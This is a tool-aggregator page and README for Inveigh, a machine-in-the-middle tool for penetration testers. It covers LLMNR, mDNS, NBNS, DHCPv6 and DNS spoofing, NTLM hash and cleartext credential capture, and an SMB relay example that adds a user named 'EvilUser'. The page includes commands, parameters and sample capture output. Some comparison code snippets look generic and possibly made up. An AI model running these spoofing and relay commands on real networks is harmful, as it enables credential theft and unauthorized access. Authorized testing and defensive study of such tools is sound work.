Top Related Projects
Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.
A swiss army knife for pentesting networks
Impacket is a collection of Python classes for working with network protocols.
Quick Overview
Inveigh is a Windows PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer and man-in-the-middle tool designed for penetration testing. It can capture and/or relay NET-NTLMv1/v2 hashes, and perform SMB relay attacks in conjunction with other tools.
Pros
- Versatile tool for network penetration testing and security assessments
- Supports multiple protocols (ADIDNS, LLMNR, mDNS, NBNS)
- Can capture and relay NET-NTLMv1/v2 hashes
- Integrates well with other security tools for comprehensive testing
Cons
- Primarily designed for Windows environments, limiting its use in other operating systems
- Requires administrative privileges to run effectively
- Can potentially disrupt network operations if not used carefully
- May be detected by some antivirus software as a potential threat
Code Examples
# Start Inveigh with default settings
Import-Module .\Inveigh.psd1
Invoke-Inveigh
# Start Inveigh with custom settings
Invoke-Inveigh -IP 192.168.1.10 -SpooferIP 192.168.1.100 -HTTP Y -HTTPS Y -FileOutput Y
# Start Inveigh in SMB relay mode
Invoke-Inveigh -SMBRelay Y -SMBRelayTarget 192.168.1.50 -SMBRelayCommand "net user /add EvilUser P@ssw0rd123"
Getting Started
-
Clone the repository:
git clone https://github.com/Kevin-Robertson/Inveigh.git -
Navigate to the Inveigh directory:
cd Inveigh -
Import the Inveigh module:
Import-Module .\Inveigh.psd1 -
Start Inveigh with default settings:
Invoke-Inveigh
Note: Ensure you have the necessary permissions and are in a controlled environment before running Inveigh. Always use this tool responsibly and with proper authorization.
Competitor Comparisons
Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.
Pros of Responder
- More comprehensive protocol support, including LLMNR, NBT-NS, MDNS, and DHCP
- Extensive logging and reporting capabilities
- Active development and regular updates
Cons of Responder
- Larger codebase, potentially more complex to understand and modify
- Primarily focused on Linux environments, limiting Windows compatibility
Code Comparison
Responder (Python):
def start_responder():
global responder
responder = Responder()
responder.start()
Inveigh (PowerShell):
function Start-Inveigh {
[CmdletBinding()]
param(
[Parameter(Position = 0)]$RunTime = "",
[Switch]$ConsoleOutput,
[Switch]$FileOutput
)
# ... additional code ...
}
Key Differences
- Responder is written in Python, while Inveigh is primarily PowerShell-based
- Inveigh offers better native Windows integration and PowerShell compatibility
- Responder provides more extensive protocol support and analysis features
- Inveigh focuses on ease of use and quick deployment in Windows environments
Use Cases
- Responder: Ideal for comprehensive network assessments and penetration testing in Linux environments
- Inveigh: Well-suited for Windows-centric environments and rapid deployment during security assessments
Both tools serve similar purposes but cater to different operating systems and user preferences. The choice between them often depends on the specific testing environment and requirements of the security assessment.
A swiss army knife for pentesting networks
Pros of CrackMapExec
- More comprehensive toolset for network penetration testing and post-exploitation
- Supports a wider range of protocols and attack vectors
- Actively maintained with frequent updates and community contributions
Cons of CrackMapExec
- Steeper learning curve due to its extensive feature set
- Requires more setup and dependencies compared to Inveigh
- May be overkill for simpler network enumeration tasks
Code Comparison
Inveigh (PowerShell):
$inveigh = New-Object System.Collections.Hashtable
$inveigh.add("HTTP",@{})
$inveigh.add("HTTPS",@{})
$inveigh.add("LLMNR",@{})
CrackMapExec (Python):
from cme.helpers.logger import highlight
from cme.helpers.misc import identify_target
from cme.helpers.powershell import get_ps_script
from cme.helpers.bloodhound import add_user_bh
Both tools serve different purposes in the realm of network security testing. Inveigh focuses on Windows-specific LLMNR/NBNS/mDNS/DNS spoofing and capture, while CrackMapExec offers a broader range of network penetration testing capabilities across multiple protocols and platforms. The code snippets demonstrate the different languages and approaches used by each tool, with Inveigh utilizing PowerShell for Windows environments and CrackMapExec leveraging Python for cross-platform functionality.
Impacket is a collection of Python classes for working with network protocols.
Pros of Impacket
- Broader protocol support, including SMB, MSRPC, NTLM, Kerberos, and more
- Extensive library of tools for various network operations and penetration testing
- Cross-platform compatibility (Windows, Linux, macOS)
Cons of Impacket
- Steeper learning curve due to its extensive feature set
- Requires more setup and dependencies compared to Inveigh
- Less focused on specific Windows attack techniques
Code Comparison
Impacket (SMB connection example):
from impacket.smbconnection import SMBConnection
conn = SMBConnection(target, target)
conn.login(username, password)
Inveigh (PowerShell LLMNR/NBNS spoofing):
Import-Module .\Inveigh.psd1
Invoke-Inveigh -LLMNR Y -NBNS Y -ConsoleOutput Y
Summary
Impacket is a comprehensive Python library for working with network protocols, offering a wide range of tools for penetration testing and network analysis. It provides broader functionality and cross-platform support but may require more setup and expertise.
Inveigh, on the other hand, is a PowerShell tool specifically designed for Windows environments, focusing on LLMNR/NBNS spoofing and capturing NetNTLM hashes. It's easier to use for specific Windows-based attacks but has a narrower scope compared to Impacket.
Convert 
designs to code with AI
Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.
Try Visual CopilotREADME
Inveigh
Inveigh is a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool for penetration testers. This repo contains the primary C# version as well as the legacy PowerShell version.
Overview
Inveigh conducts spoofing attacks and hash/credential captures through both packet sniffing and protocol specific listeners/sockets. The packet sniffing method, which was the basis for the original PowerShell version of this tool, has the following advantages:
- SMB NTLM challenge/response captures over the Window's SMB service
- Fewer visible port binds on the host system
The primary disadvantage is the required elevated access.
On current versions of Windows, the default running UDP services allow port reuse. Therefore, packet sniffing no longer provides an advantage for getting around in-use UDP ports. Inveigh's UDP listeners are all configured to take advantage of port reuse.
Version Descriptions
- PowerShell Inveigh - original version developed over many years. For now at least, this version (1.506) will go without additional updates. Documentation can be found here.
- C# Inveigh (aka InveighZero) - original C# POC code combined with a C# port of most of the PowerShell version's code. This version has now been rebuilt for C# and is taking over as the primary version.
Features
The C# version of Inveigh contains attacks for the following protocols:
- LLMNR [packet sniffer | listener]
- DNS [packet sniffer | listener]
- mDNS [packet sniffer | listener]
- NBNS [packet sniffer | listener]
- DHCPv6 [packet sniffer | listener]
- ICMPv6 [privileged raw socket]
- HTTP [listener]
- HTTPS [listener]
- SMB [packet sniffer | listener]
- LDAP [listener]
- WebDAV [listener]
- Proxy Auth [listener]
Inveigh works with both IPv4 and IPv6 in cases where support for both is provided by the underlying protocol.
Cross-Platform Support
Inveigh's SDK style project file is setup for .NET 3.5, 4.6.2, and 6.0 with 6.0 being the version that also works with Linux and macOS.
<TargetFrameworks>net35;net62;net6.0</TargetFrameworks>
Known Issues
- The packet sniffer is available only on Windows due to differences in the raw socket setups. When compiled for either Linux or macOS, the packet sniffer will just be disabled. Instead, Inveigh's SMB listener can be used if port 445 is open.
- macOS requires that routes are available for joining multicast groups. In my testing, I've had to add routes for DHCPv6 multicast in order to carry out that attack on this platform.
sudo route -nv add -net ff02::1:2 -interface en0
Execution
dotnet Inveigh.dll
Linux/macOS Platform Targeted Builds
-
With .NET 6.0 installed on target system
dotnet publish -r linux-x64 -f net8.0 -p:AssemblyName=inveigh
dotnet publish -r osx-x64 -f net8.0 -p:AssemblyName=inveigh -
Without .NET 6.0 installed on target system
dotnet publish --self-contained=true -p:PublishSingleFile=true -r linux-x64 -f net8.0 -p:AssemblyName=inveigh
dotnet publish --self-contained=true -p:PublishSingleFile=true -r osx-x64 -f net8.0 -p:AssemblyName=inveigh
Usage
Default parameter values are located at the beginning of Program.cs. I recommend reviewing and setting everything to fit your needs before compile. All enable/disable parameters can be set with Y/N values.
//begin parameters - set defaults as needed before compile
public static string argCert = "MIIKaQIBAzCCC..."
public static string argCertPassword = "password";
public static string argChallenge = "";
public static string argConsole = "5";
public static string argConsoleLimit = "-1";
public static string argConsoleStatus = "0";
public static string argConsoleUnique = "Y";
public static string argDHCPv6 = "N";
public static string argDHCPv6TTL = "30";
public static string argDNS = "Y";
...
//end parameters
Parameter Help
.\Inveigh.exe -?
Control:
-Inspect Default=Disabled: (Y/N) inspect traffic only.
-IPv4 Default=Enabled: (Y/N) IPv4 spoofing/capture.
-IPv6 Default=Enabled: (Y/N) IPv6 spoofing/capture.
-RunCount Default=Unlimited: Number of NetNTLM captures to perform before auto-exiting.
-RunTime Default=Unlimited: Run time duration in minutes.
Output:
-Console Default=5: Set the level for console output. (0=none, 1=only captures/spoofs, 2=no disabled, no informational, 3=no disabled, no filtered, 4=no disabled, 5=all)
-ConsoleLimit Default=Unlimited: Limit to queued console entries.
-ConsoleStatus Default=Disabled: Interval in minutes for auto-displaying capture details.
-ConsoleUnique Default=Enabled: (Y/N) displaying only unique (user and system combination) hashes at time of capture.
-FileDirectory Default=Working Directory: Valid path to an output directory for enabled file output.
-FileOutput Default=Enabled: (Y/N) real time file output.
-FilePrefix Default=Inveigh: Prefix for all output files.
-FileUnique Default=Enabled: (Y/N) outputting only unique (user and system combination) hashes.
-LogOutput Default=Disabled: (Y/N) outputting log entries.
Spoofers:
-DHCPV6 Default=Disabled: (Y/N) DHCPv6 spoofing.
-DHCPv6TTL Default=300: Lease lifetime in seconds.
-DNS Default=Enabled: (Y/N) DNS spoofing.
-DNSHost Fully qualified hostname to use SOA/SRV responses.
-DNSSRV Default=LDAP: Comma separated list of SRV request services to answer.
-DNSSuffix DNS search suffix to include in DHCPv6/ICMPv6 responses.
-DNSTTL Default=30: DNS TTL in seconds.
-DNSTYPES Default=A: (A, AAAA, SOA, SRV) Comma separated list of DNS types to spoof.
-ICMPv6 Default=Enabled: (Y/N) sending ICMPv6 router advertisements.
-ICMPv6Interval Default=200: ICMPv6 RA interval in seconds.
-ICMPv6TTL Default=300: ICMPv6 TTL in seconds.
-IgnoreDomains Default=None: Comma separated list of domains to ignore when spoofing.
-IgnoreIPs Default=Local: Comma separated list of source IP addresses to ignore when spoofing.
-IgnoreMACs Default=Local: Comma separated list of MAC addresses to ignore when DHCPv6 spoofing.
-IgnoreQueries Default=None: Comma separated list of name queries to ignore when spoofing.
-Local Default=Disabled: (Y/N) performing spoofing attacks against the host system.
-LLMNR Default=Enabled: (Y/N) LLMNR spoofing.
-LLMNRTTL Default=30: LLMNR TTL in seconds.
-MAC Local MAC address for DHCPv6.
-MDNS Default=Enabled: (Y/N) mDNS spoofing.
-MDNSQuestions Default=QU,QM: Comma separated list of question types to spoof. (QU,QM)
-MDNSTTL Default=120: mDNS TTL in seconds.
-MDNSTypes Default=A: Comma separated list of mDNS record types to spoof. (A,AAAA,ANY)
-MDNSUnicast Default=Enabled: (Y/N) sending a unicast only response to a QM request.
-NBNS Default=Disabled: (Y/N) NBNS spoofing.
-NBNSTTL Default=165: NBNS TTL in seconds.
-NBNSTypes Default=00,20: Comma separated list of NBNS types to spoof. (00,03,20,1B)
-ReplyToDomains Default=All: Comma separated list of domains to respond to when spoofing.
-ReplyToIPs Default=All: Comma separated list of source IP addresses to respond to when spoofing.
-ReplyToMACs Default=All: Comma separated list of MAC addresses to respond to when DHCPv6 spoofing.
-ReplyToQueries Default=All: Comma separated list of name queries to respond to when spoofing.
-SpooferIP Default=Autoassign: IP address included in spoofing responses.
-SpooferIPv6 Default=Autoassign: IPv6 address included in spoofing responses.
-Repeat Default=Enabled: (Y/N) repeated spoofing attacks against a system after NetNTLM capture.
Capture:
-Cert Base64 certificate for TLS.
-CertPassword Base64 certificate password for TLS.
-Challenge Default=Random per request: 16 character hex NetNTLM challenge for use with the TCP listeners.
-HTTP Default=Enabled: (Y/N) HTTP listener.
-HTTPAuth Default=NTLM: (Anonymous/Basic/NTLM) HTTP/HTTPS listener authentication.
-HTTPPorts Default=80: Comma seperated list of TCP ports for the HTTP listener.
-HTTPRealm Default=ADFS: Basic authentication realm.
-HTTPResponse Content to serve as the default HTTP/HTTPS/Proxy response.
-HTTPS Default=Enabled: (Y/N) HTTPS listener.
-HTTPSPorts Default=443: Comma separated list of TCP ports for the HTTPS listener.
-IgnoreAgents Default=Firefox: Comma separated list of HTTP user agents to ignore with wpad and proxy auth.
-LDAP Default=Enabled: (Y/N) LDAP listener.
-LDAPPorts Default=389: Comma separated list of TCP ports for the LDAP listener.
-ListenerIP Default=Any: IP address for all listeners.
-ListenerIPv6 Default=Any: IPv6 address for all listeners.
-MachineAccount Default=Enabled: (Y/N) machine account NetNTLM captures.
-Proxy Default=Disabled: (Y/N) proxy listener authentication captures.
-ProxyAuth Default=NTLM: (Basic/NTLM) Proxy authentication.
-ProxyPort Default=8492: Port for the proxy listener.
-SMB Default=Enabled: (Y/N) SMB sniffer/listener.
-SMBPorts Default=445: Port for the SMB listener.
-SnifferIP Default=Autoassign: IP address included in spoofing responses.
-SnifferIPv6 Default=Autoassign: IPv6 address included in spoofing responses.
-WebDAV Default=Enabled: (Y/N) serving WebDAV over HTTP/HTTPS listener.
-WebDAVAuth Default=NTLM: (Anonymous/Basic/NTLM) WebDAV authentication.
-WPADAuth Default=Enabled: (Y/N) authentication type for wpad.dat requests. (Anonymous/Basic/NTLM)
-WPADResponse Default=Autogenerated: Contents of wpad.dat responses.
Default (autodetect local IPs)
.\Inveigh.exe
[*] Inveigh 2.0 [Started 2021-06-15T00:08:37 | PID 12588]
[+] Packet Sniffer Addresses [IP 10.10.2.111 | IPv6 fe80::3d3b:b73c:c43e:ed4e%2]
[+] Listener Addresses [IP 0.0.0.0 | IPv6 ::]
[+] Spoofer Reply Addresses [IP 10.10.2.111 | IPv6 fe80::3d3b:b73c:c43e:ed4e%2]
[+] Spoofer Options [Repeat Enabled | Local Attacks Disabled]
[-] DHCPv6
[+] DNS Packet Sniffer [Type A]
[-] ICMPv6
[+] LLMNR Packet Sniffer [Type A]
[-] MDNS
[-] NBNS
[+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 80]
[-] HTTPS
[+] WebDAV [WebDAVAuth NTLM]
[-] Proxy
[+] LDAP Listener [Port 389]
[+] SMB Packet Sniffer [Port 445]
[+] File Output [C:\Users\dev\source\repos\Inveigh\Inveigh\bin\Debug\net35]
[+] Previous Session Files [Imported]
[*] Press ESC to enter/exit interactive console
Listener Only Mode (disabled packet sniffer)
.\Inveigh.exe -sniffer n
[*] Inveigh 2.0 [Started 2021-06-14T10:48:16 | PID 20368]
[-] Packet Sniffer
[+] Listener Addresses [IP 0.0.0.0 | IPv6 ::]
[+] Spoofer Reply Addresses [IP 10.10.2.111 | IPv6 fe80::3d3b:b73c:c43e:ed4e%2]
[+] Spoofer Options [Repeat Enabled | Local Attacks Disabled]
[-] DHCPv6
[+] DNS Listener [Type A]
[-] ICMPv6
[+] LLMNR Listener [Type A]
[-] MDNS
[-] NBNS
[+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 80]
[-] HTTPS
[+] WebDAV [WebDAVAuth NTLM]
[-] Proxy
[+] LDAP Listener [Port 389]
[+] SMB Listener [Port 445]
[+] File Output [C:\Users\dev\source\repos\InveighZero\Inveigh\bin\Debug\net35]
[+] Previous Session Files [Imported]
[*] Press ESC to enter/exit interactive console
[!] Failed to start SMB listener on port 445, check IP and port usage.
[!] Failed to start SMB listener on port 445, check IP and port usage.
Note, with the packet sniffer disabled, Inveigh will attempt to start SMB listeners for IPv4 and IPv6. On most windows systems, port 445 will already be in use. Either ignore error or add -smb n.
DHCPv6
Start DHCPv6 spoofer and IPv6 DNS spoofer. Note, DNS is on by default.
.\Inveigh.exe -dhcpv6 y
...
[+] DHCPv6 Listener [MAC 52:54:00:FF:B5:53]
[+] DNS Listener [Type A]
...
[+] [23:03:06] DHCPv6 [solicitation] from fe80::bd92:a800:60d0:8deb%2(test-wks1.lab.inveigh.org) [response sent]
[+] [23:03:06] DHCPv6 [fe80::1348:1] advertised to [00:0C:29:F0:6E:16]
[+] [23:03:06] DHCPv6 [request] from fe80::bd92:a800:60d0:8deb%2(test-wks1.lab.inveigh.org) [response sent]
[+] [23:03:06] DHCPv6 [fe80::1348:1] leased to [00:0C:29:F0:6E:16]
Start DHCPv6 spoofer and spoof DNS requests for internal domain only.
.\Inveigh.exe -dhcpv6 y -replytodomains lab.inveigh.org
...
[+] DHCPv6 Listener [MAC 52:54:00:FF:B5:53]
[+] DNS Listener [Type A]
...
[-] [23:10:30] DNS(A) request [test.inveigh.org] from fe80::6142:1%2 [domain ignored]
[+] [23:10:33] DNS(A) request [wpad.lab.inveigh.org] from fe80::6142:1%2 [response sent]
Start DHCPv6 spoofer and also send out ICMPv6 RA packets.
.\Inveigh.exe -dhcpv6 y -icmpv6 y
...
[+] DHCPv6 Listener [MAC 52:54:00:FF:B5:53]
[+] DNS Listener [Type A]
[+] ICMPv6 Router Advertisement [Interval 200 Seconds]
...
[+] [23:12:04] ICMPv6 router advertisment sent to [ff02::1]
Start DHCPv6 spoofer and answer requests from the local host.
.\Inveigh.exe -dhcpv6 y -local y
...
[+] Spoofer Options [Repeat Enabled | Local Attacks Enabled]
[+] DHCPv6 Listener [MAC 52:54:00:FF:B5:53]
DNS
Spoof SRV requests in addition to A.
.\Inveigh.exe -dnstypes A,SRV -dnshost fake.lab.inveigh.org
...
[+] DNS Listener [Types A:SRV]
...
[+] [23:21:05] DNS(SRV) request [_ldap._tcp.dc._msdcs.lab.inveigh.org] from fe80::242d:f99e:7534:b46f%2 [response sent]
ICMPv6
Send ICMPv6 packets to inject a secondary IPv6 DNS server on local subnet systems.
.\Inveigh.exe -icmpv6 y
...
[+] ICMPv6 Router Advertisement [Option DNS | Interval 200 Seconds]
...
[+] [23:35:46] ICMPv6 router advertisement with DNSv6 sent to [ff02::1]
Send ICMPv6 packets to inject an additional DNS search suffix on local subnet systems.
.\Inveigh.exe -icmpv6 y -dnssuffix inveigh.net
...
[+] ICMPv6 Router Advertisement [Option DNS Suffix | Interval 200 Seconds]
...
[+] [23:41:17] ICMPv6 router advertisement with DNS Suffix sent to [ff02::1]
LLMNR
Spoof AAAA requests instead of A.
.\Inveigh.exe -llmnrtypes AAAA
...
[+] LLMNR Listener [Type AAAA]
...
[-] [23:23:38] LLMNR(A) request [test] from fe80::bd92:a800:60d0:8deb%2 [type ignored]
[-] [23:23:38] LLMNR(A) request [test] from 10.10.2.201 [type ignored]
[+] [23:23:38] LLMNR(AAAA) request [test] from 10.10.2.201 [response sent]
[+] [23:23:38] LLMNR(AAAA) request [test] from fe80::bd92:a800:60d0:8deb%2 [response sent]
mDNS
Start mDNS spoofer and send unicast responses to QM requests.
.\Inveigh.exe -mdns y
...
[+] MDNS Listener [Questions QU:QM | Type A]
...
[+] [23:25:58] mDNS(QM)(A) request [test.local] from fe80::bd92:a800:60d0:8deb%2 [response sent]
[+] [23:25:58] mDNS(QM)(A) request [test.local] from 10.10.2.201 [response sent]
[-] [23:25:58] mDNS(QM)(AAAA) request [test.local] from 10.10.2.201 [type ignored]
[-] [23:25:58] mDNS(QM)(AAAA) request [test.local] from fe80::bd92:a800:60d0:8deb%2 [type ignored]
Start mDNS spoofer and send multicast responses to QM requests.
.\Inveigh.exe -mdns y -mdnsunicast n
...
[+] MDNS Listener [Questions QU:QM | Type A]
...
[+] [23:28:26] mDNS(QM)(A) request [test.local] from 10.10.2.201 [response sent]
[+] [23:28:26] mDNS(QM)(A) request [test.local] from fe80::bd92:a800:60d0:8deb%2 [response sent]
NBNS
Start NBNS spoofer
.\Inveigh.exe -nbns y
...
[+] NBNS Listener [Types 00:20]
...
[+] [23:33:09] NBNS(00) request [TEST] from 10.10.2.201 [response sent]
HTTP
Start HTTP listener on port 80 (enabled by default)
.\Inveigh.exe
...
[+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 80]
...
Start HTTP listeners on multiple ports
.\Inveigh.exe -httpports 80,8080
...
[+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Ports 80:8080]
...
HTTPS
Start HTTPS listener on port 443 with Inveigh's default cert
.\Inveigh.exe -https y
...
[+] HTTPS Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 443]
...
SMB
Start SMB packet sniffer (enabled by default)
.\Inveigh.exe
...
[+] SMB Packet Sniffer [Port 445]
...
Start SMB listener on port 445
.\Inveigh.exe -sniffer n
...
[+] SMB Listener [Port 445]
...
LDAP
Start LDAP listener on port 389
.\Inveigh.exe
...
[+] LDAP Listener [Port 389]
...
WebDAV
Start the HTTP listener with WebDAV support (enabled by default)
.\Inveigh.exe
...
[+] WebDAV [WebDAVAuth NTLM]
...
Proxy Auth
Enable proxy auth capture on port 8492
.\Inveigh.exe -proxy y
...
[+] Proxy Listener [ProxyAuth NTLM | Port 8492]
...
Console
Inveigh contains a console that is accessible while the tool is running (hit escape to enter and exit). The console provides easy access to captured credentials/hashes and other various information. The console's prompt provides real-time updates for cleartext, NTLMv1, and NTLMv2 captue counts in the format of unique:total. Note, the console may be inaccessible when running through C2.
Interactive Console Help - enter ? or HELP
=============================================== Inveigh Console Commands ===============================================
Command Description
========================================================================================================================
GET CONSOLE | get queued console output
GET DHCPv6Leases | get DHCPv6 assigned IPv6 addresses
GET LOG | get log entries; add search string to filter results
GET NTLMV1 | get captured NTLMv1 hashes; add search string to filter results
GET NTLMV2 | get captured NTLMv2 hashes; add search string to filter results
GET NTLMV1UNIQUE | get one captured NTLMv1 hash per user; add search string to filter results
GET NTLMV2UNIQUE | get one captured NTLMv2 hash per user; add search string to filter results
GET NTLMV1USERNAMES | get usernames and source IPs/hostnames for captured NTLMv1 hashes
GET NTLMV2USERNAMES | get usernames and source IPs/hostnames for captured NTLMv2 hashes
GET CLEARTEXT | get captured cleartext credentials
GET CLEARTEXTUNIQUE | get unique captured cleartext credentials
GET REPLYTODOMAINS | get ReplyToDomains parameter startup values
GET REPLYTOIPS | get ReplyToIPs parameter startup values
GET REPLYTOMACS | get ReplyToMACs parameter startup values
GET REPLYTOQUERIES | get ReplyToQueries parameter startup values
GET IGNOREDOMAINS | get IgnoreDomains parameter startup values
GET IGNOREIPS | get IgnoreIPs parameter startup values
GET IGNOREMACS | get IgnoreMACs parameter startup values
GET IGNOREQUERIES | get IgnoreQueries parameter startup values
SET CONSOLE | set Console parameter value
HISTORY | get command history
RESUME | resume real time console output
STOP | stop Inveigh
Interactive Console Prompt
The console prompt contains real time capture counts.
C(0:0) NTLMv1(0:0) NTLMv2(0:0)>
Cleartext(unique:total) NTLMv1(unique:total) NTLMv2(unique:total)
Quiddity
The protocol library used by Inveigh is located here.
Special Thanks
- Responder - https://github.com/lgandx/Responder
- Impacket - https://github.com/SecureAuthCorp/impacket
- mitm6 - https://github.com/fox-it/mitm6
Top Related Projects
Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.
A swiss army knife for pentesting networks
Impacket is a collection of Python classes for working with network protocols.
Convert designs to code with AI
Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.
Try Visual Copilot